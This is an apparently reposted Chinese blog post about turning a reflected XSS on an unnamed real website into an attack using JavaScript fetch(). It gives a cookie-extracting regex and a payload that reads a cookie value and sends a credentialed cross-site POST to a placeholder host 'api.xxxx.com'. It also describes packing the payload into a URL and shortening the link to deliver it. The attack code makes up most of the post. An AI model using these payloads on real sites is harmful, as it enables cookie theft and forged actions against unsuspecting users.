xss利用之fetch

栏目: 编程工具 · 发布时间: 5年前

内容简介:偶然间发现某站有个漏洞因为有WAF不好利用,我之前是不知道能咋利用,然后大佬说能XSS利用,叫我写个fetch利用,

偶然间发现某站有个漏洞

因为有WAF不好利用,我之前是不知道能咋利用,

然后大佬说能XSS利用,叫我写个fetch利用,

我?????

试着去学fetch这个东西了

于是有了此文

正文

首先看看说明文档那个样子 https://segmentfault.com/a/1190000007019545

大致理解了

然后发出一个fetch的post请求

也就是这个样子

fetch("http://192.168.199.141:3000/api/user/",{
  method:'POST',
  headers:{
     'Content-Type': 'application/json'
  },
  body:JSON.stringify({
    name:'john',
    pass:'xioayuan'
  })
})
.then((response)=>response.json())
.then((responseJsonData)=>{
  alert("请求成功");
  console.log(responseJsonData);
})
.catch((error)=>{
  alert(error);
})

如果XSS点能利用,就在这里发送一个fetch请求,来作为利用点

假如利用点要用到cookie里面的某些值,我们可以用js来提取cookie里的特定段值,可以写个正则提取比如

document.cookie.replace(/(?:(?:^|.*;\s*)key\s*\=\s*([^;]*).*$)|^.*$/, '$1')

这样就能提取到key的值了

上面的body是一个json类型,如果是一般类型的我们可以直接写一个这样的JS

var form = 'xxxxxx'+document.cookie.replace(/(?:(?:^|.*;\s*)key\s*\=\s*([^;]*).*$)|^.*$/, '$1');
fetch('https://api.xxxx.com/add', {
method: "POST",
mode: "cors",
credentials: 'include',
headers: {
"Content-Type": "application/x-www-form-urlencoded"
},
body: form
});

直接在url里面构造就行了,然后把链接去生成一个短链接,就算完成了。

这样一个反射XSS的利用还是蛮有意思的。


以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

The Web Application Hacker's Handbook

The Web Application Hacker's Handbook

Dafydd Stuttard、Marcus Pinto / Wiley / 2011-9-27 / USD 50.00

The highly successful security book returns with a new edition, completely updated Web applications are the front door to most organizations, exposing them to attacks that may disclose personal infor......一起来看看 《The Web Application Hacker's Handbook》 这本书的介绍吧!

图片转BASE64编码
图片转BASE64编码

在线图片转Base64编码工具

URL 编码/解码
URL 编码/解码

URL 编码/解码

html转js在线工具
html转js在线工具

html转js在线工具